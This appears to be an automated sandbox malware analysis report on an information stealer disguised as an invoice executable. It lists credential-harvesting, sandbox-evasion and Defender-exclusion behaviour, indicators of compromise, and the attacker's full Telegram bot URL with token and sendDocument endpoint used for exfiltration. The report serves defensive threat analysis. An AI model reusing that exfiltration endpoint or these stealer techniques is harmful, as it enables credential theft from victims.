                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446730 Sample: COMMERCIAL INVOICE - BL - A... Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 23 api.telegram.org 2->23 27 Snort IDS alert for network traffic 2->27 29 Found malware configuration 2->29 31 Malicious sample detected (through community Yara rule) 2->31 35 12 other signatures 2->35 8 COMMERCIAL INVOICE - BL - AWB 7032805642.exe 1 3 2->8         started        signatures3 33 Uses the Telegram API (likely for C&C communication) 23->33 process4 signatures5 37 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->37 39 Writes to foreign memory regions 8->39 41 Adds a directory exclusion to Windows Defender 8->41 43 2 other signatures 8->43 11 AddInProcess32.exe 15 2 8->11         started        15 powershell.exe 23 8->15         started        17 WerFault.exe 19 16 8->17         started        19 AddInProcess32.exe 8->19         started        process6 dnsIp7 25 api.telegram.org 149.154.167.220, 443, 49711 TELEGRAMRU United Kingdom 11->25 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->47 49 Tries to steal Mail credentials (via file / registry access) 11->49 53 2 other signatures 11->53 51 Loading BitLocker PowerShell Module 15->51 21 conhost.exe 15->21         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      COMMERCIAL INVOICE - BL - AWB 7032805642.exe50%ReversingLabsByteCode-MSIL.Trojan.Injuke
                      COMMERCIAL INVOICE - BL - AWB 7032805642.exe100%AviraTR/AD.GenSteal.ctcnj

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://api.telegram.org0%Avira URL Cloudsafe
                      https://api.telegram.org0%Avira URL Cloudsafe
                      https://www.google.ru/0%Avira URL Cloudsafe
                      https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocument0%Avira URL Cloudsafe
                      https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/sendDocumenttrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot6521856051:AAE_VqJACYh8GJnmBCYkrp8n7Ax0fW5fJ5s/COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2464175604.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://upx.sf.netAmcache.hve.8.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://account.dyn.com/COMMERCIAL INVOICE - BL - AWB 7032805642.exe, 00000000.00000002.1331684482.00000198756F1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2460982055.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.orgAddInProcess32.exe, 00000004.00000002.2464175604.0000000002C46000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://api.telegram.orgAddInProcess32.exe, 00000004.00000002.2464175604.0000000002C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAddInProcess32.exe, 00000004.00000002.2464175604.0000000002C46000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.ru/COMMERCIAL INVOICE - BL - AWB 7032805642.exefalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        149.154.167.220
                        		api.telegram.orgUnited Kingdom
                        		62041TELEGRAMRUtrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1446730
                        Start date and time:2024-05-23 20:21:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 46s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:21
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.expl.evad.winEXE@9/10@1/1
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.42.65.92
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target COMMERCIAL INVOICE - BL - AWB 7032805642.exe, PID 3648 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.
                        • VT rate limit hit for: COMMERCIAL INVOICE - BL - AWB 7032805642.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        14:21:58API Interceptor21x Sleep call for process: powershell.exe modified
                        14:22:03API Interceptor1x Sleep call for process: WerFault.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        149.154.167.220Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                          ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                            SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                              RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                  MSK203.exeGet hashmaliciousGuLoaderBrowse
                                    New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                      gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                        Pg5dhIO92K.exeGet hashmaliciousAgentTeslaBrowse
                                          Shipping Reference_AWB 703280542_INVOICE_PDF.exeGet hashmaliciousAgentTeslaBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            api.telegram.orgDoc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                            • 149.154.167.220
                                            ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                            • 149.154.167.220
                                            RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            MSK203.exeGet hashmaliciousGuLoaderBrowse
                                            • 149.154.167.220
                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                            • 149.154.167.220
                                            gtKVgxrJ22.exeGet hashmaliciousGurcu Stealer, WhiteSnake StealerBrowse
                                            • 149.154.167.220
                                            Pg5dhIO92K.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            Shipping Reference_AWB 703280542_INVOICE_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            TELEGRAMRUDoc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                            • 149.154.167.220
                                            ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                            • 149.154.167.220
                                            http://enter-mantagalaxies.com/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                            • 149.154.167.220
                                            MSK203.exeGet hashmaliciousGuLoaderBrowse
                                            • 149.154.167.220
                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                            • 149.154.167.220
                                            https://scandal-lucah-melayu-viral.group-telegram.my.id/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.99
                                            https://danakaget.uniclodw.web.id/Get hashmaliciousUnknownBrowse
                                            • 149.154.164.13

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0ekam.cmdGet hashmaliciousGuLoaderBrowse
                                            • 149.154.167.220
                                            Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                            • 149.154.167.220
                                            upload.vbsGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                            • 149.154.167.220
                                            update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                            • 149.154.167.220
                                            file.vbsGet hashmaliciousGuLoaderBrowse
                                            • 149.154.167.220
                                            windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                            • 149.154.167.220
                                            https://atualizar-cmd.com/Get hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            update.vbsGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220
                                            file.vbsGet hashmaliciousUnknownBrowse
                                            • 149.154.167.220

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_COMMERCIAL INVOI_d7834551923348fdd4bf39d55123055b1a346a_65c60274_2eae240f-f059-4d10-a8b0-0f9a1e70392f\Report.wer

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):1.1949028292640749
                                            Encrypted:false
                                            SSDEEP:192:Sa5jGTO4h50UnUlaWxeVSvibdzuiFCZ24lO83m:z94haUnUlaG8ZZzuiFCY4lO83m
                                            MD5:97E46A7EE87F27DE0F5460FD094A1CCB
                                            SHA1:90473DADC64A1856B80E24F2125F2174EC3F2E07
                                            SHA-256:0AA3AC33CA6B12A478E97D31F81C67BEECDE7AEA714371500AAC9782F606303B
                                            SHA-512:C3032F5040631F91BBC909F109B490601200E5C033035B5308CD5B2A9440CE317CAD961CDD965A63EE9B80DE19BB01046636C1856D29E24A9E6750AFDC0C5F0D
                                            Malicious:false
                                            Reputation:low
                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.9.6.2.1.1.7.3.4.2.7.7.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.2.1.1.8.5.6.1.4.5.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.a.e.2.4.0.f.-.f.0.5.9.-.4.d.1.0.-.a.8.b.0.-.0.f.9.a.1.e.7.0.3.9.2.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.c.5.4.1.1.5.-.6.e.4.7.-.4.b.1.7.-.8.1.8.b.-.1.6.2.4.e.f.6.3.7.c.2.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.C.O.M.M.E.R.C.I.A.L. .I.N.V.O.I.C.E. .-. .B.L. .-. .A.W.B. .7.0.3.2.8.0.5.6.4.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.p.e.c.e.l.o.v.e.c.a.c.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.4.0.-.0.0.0.1.-.0.0.1.3.-.0.2.2.1.-.7.8.1.5.3.e.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.2.d.3.4.c.8.5.b.5.d.7.3.7.c.2.a.0.c.e.f.d.4.3.7.4.7.c.f.2.8.1.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.8.0.a.c.b.c.5.4.6.4.2.8.8.2.a.4.a.3.

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4A7.tmp.dmp

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:Mini DuMP crash report, 16 streams, Thu May 23 18:21:57 2024, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):513401
                                            Entropy (8bit):3.3632220076962374
                                            Encrypted:false
                                            SSDEEP:3072:GqTCqfY1sN3DF5Q1CCqztC3+v1yBfn4Mg0s94Ml0iFN6McSlxb+:GqTCqb3OqztC3Q1yBfG1w2N64zS
                                            MD5:F3225F564E5BB3417A7D0FD58B9C0BE3
                                            SHA1:0E223A084CDFC9C0464CE409EA5500D7B78ABF5A
                                            SHA-256:998E578ECF36497D81AE13C63763882C8A8F8A5D58DB0B48272B82892112EFC2
                                            SHA-512:2EC9796E3CEDB2015D17F0834E692413EDABE75F96386EF19CE407B4F3A6D7EDAB14EA654ED53D771A83AD5794CE299B7E0F8DE797A762442F16072787A36A0B
                                            Malicious:false
                                            Reputation:low
                                            Preview:MDMP..a..... .......E.Of............t...........H...........$....%.......3...&.......p..............l.......8...........T............8...............Y...........[..............................................................................eJ......L\......Lw......................T.......@...@.Of.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF709.tmp.WERInternalMetadata.xml

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8728
                                            Entropy (8bit):3.7201212898070066
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJ85d6YWwP1jgmfvL5hprG89bty9fLvm:R6lXJqd6YRP1jgmfvL5jt4fK
                                            MD5:519749FD56AA47F17C8BF02768C8E0C7
                                            SHA1:D23C799031AF3ADBBAC21ECD88A4402CBF476A6A
                                            SHA-256:711D48444CAFB672F9ED819BCA008269AD4DC389FAE244773F66ED17B0C077E9
                                            SHA-512:FFBF2EB9CB95370C4CD11EBBA69C636AD3C130C78437EB988859604B6AA0FF676D4751C5B48E56F60449C5048D7DAE57D84312E37811EF09E61380DE43182C3D
                                            Malicious:false
                                            Reputation:low
                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.4.8.<./.P.i.

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7F5.tmp.xml

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4919
                                            Entropy (8bit):4.595747241326101
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zs6Jg771I9PgVWpW8VY/PYm8M4JkivMivhnFMyq85Iiv4dpnRivfAEivY:uIjfII7sN7VfJkmMmMJmsTmfAEmfCd
                                            MD5:44A02D807E62D19DA8D3DAE9A3C27891
                                            SHA1:4B7ABE17135BF39851CB7ED6AFD8355F8EEF686F
                                            SHA-256:5AEE942C9F562FC6644F288FC3431A1CA2FA3DBD8CC42A65106C42648618C5C3
                                            SHA-512:EEE84A20F3C3DE62B23A36CA5A60366BC4E977B4742DC40C6380ECC13A568087E9931A05790692841D0394671F5E5B14179DBC9480BD7A30DC1EBBE0DCCAA908
                                            Malicious:false
                                            Reputation:low
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336084" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                            MD5:DA1F22117B9766A1F0220503765A5BA5
                                            SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                            SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                            SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:@...e.................................R..............@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zdhnazt.3lq.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4us1mcsa.nnh.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh5pnaz3.53w.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yefk2xkd.aml.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Windows\appcompat\Programs\Amcache.hve

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:MS Windows registry file, NT/2000 or above
                                            Category:dropped
                                            Size (bytes):1835008
                                            Entropy (8bit):4.296061047596634
                                            Encrypted:false
                                            SSDEEP:6144:b41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+v4XmBMZJh1VjL:U1/YCW2AoQ0NiaXwMHrVX
                                            MD5:C2A1328546B3D58F3813CD07BF1981E8
                                            SHA1:5E89CB057AE18DA08C1035ED0E5991888E8F552C
                                            SHA-256:419AFDC7E0E0AACE596C04C67644CA9E2E0098D7E26418C7721F75DEB11D4C1C
                                            SHA-512:0ABCB93228EFBF591C790C5AEBDE7B96575EF75D2BBD51A292F5B47C4548062779A0495104E5C21394FA143020B56F4B040B7CAE283E218D0136089F7E94D4BC
                                            Malicious:false
                                            Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmnA..>.................................................................................................................................................................................................................................................................................................................................................,........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.9768800929644845
                                            TrID:
                                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                            • Win64 Executable GUI (202006/5) 46.43%
                                            • Win64 Executable (generic) (12005/4) 2.76%
                                            • Generic Win/DOS Executable (2004/3) 0.46%
                                            • DOS Executable Generic (2002/1) 0.46%
                                            File name:COMMERCIAL INVOICE - BL - AWB 7032805642.exe
                                            File size:622'089 bytes
                                            MD5:7831435dbf79df5631126a63a722cf35
                                            SHA1:2380acbc54642882a4a3ebaa0a892eda4ea50b96
                                            SHA256:b4c52779d09ea4edabef9ef75c2756cdd9a1fc0c10564ea7cd153ca223d0a9d8
                                            SHA512:355396d92d844bc72998588bb97b61379b7799ca3b8cb1a8101ed09fc83c2999b7c6f7a820272efe860f2cf22aaf27f62320e543b7afece79df9e8e3e4c7d070
                                            SSDEEP:12288:U0p92TpQ1USCgfrSAOsWmjWh/DEzliFDwKM7Z0l8i7ZPcflAAky+:/P8plSf2AOuGDbFDzM0q4Zkfqfy+
                                            TLSH:C9D42387F1CD841AD9DC277B4069B5D02BB6D1052C03973D5FAD024E696B7E0CBE2B92
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...&............."...0. l............... ....@...... ....................................`................................

                                            File Icon

                                            Icon Hash:6c693168c8e0e0b0

                                            Static PE Info

                                            General

                                            Entrypoint:0x400000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xD9A1AC26 [Thu Sep 13 20:27:18 2085 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:

                                            Entrypoint Preview

                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x1588.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
